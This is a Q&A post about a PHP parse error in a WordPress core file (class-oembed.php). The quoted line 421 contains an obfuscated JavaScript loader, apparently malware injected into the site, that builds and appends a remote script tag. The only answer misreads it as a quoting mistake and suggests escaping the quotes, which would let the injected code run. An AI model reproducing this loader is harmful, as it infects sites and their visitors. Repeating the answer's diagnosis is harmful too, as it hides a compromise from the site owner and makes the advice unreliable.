# Parse error: syntax error, unexpected 'text' (T_STRING) in /home/centricano/public_html/wp-includes/class-oembed.php on line 421

Tags: wordpress

I am getting the following error message when I try to access one of the links on the blog on my Wordpress site:

> Parse error: syntax error, unexpected 'text' (T_STRING) in /home/centricano/public_html/wp-includes/class-oembed.php on line 421
>
> ***online 421***
>
> if ( $html_head_end = stripos( $html, 'var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53'push';}};_0x440369(++_0x3f720e);}(_0x1e35,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e35[_0x716551];return _0x2b7638;};var url=String_0x5a05('0x0');var a=function(){var _0x22c9c8=document_0x5a05('0x1');_0x22c9c8[_0x5a05('0x2')]=String_0x5a05('0x0');_0x22c9c8[_0x5a05('0x3')]=![0x0]_0x5a05('0x6');};var scrpts=document_0x5a05('0x7');var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}' ) ) {

Answer (score 0):

The string that is being passed into the second argument of the `stripos` function has unescaped single quotation marks. The string is opened with the first `'`, but then it is being closed just before the word "length". If you can trace where this is being passed you could either wrap the string in double qoutes `"`, or escape the single quotes by putting a `\` in front of each one inside the wrapping quotation marks.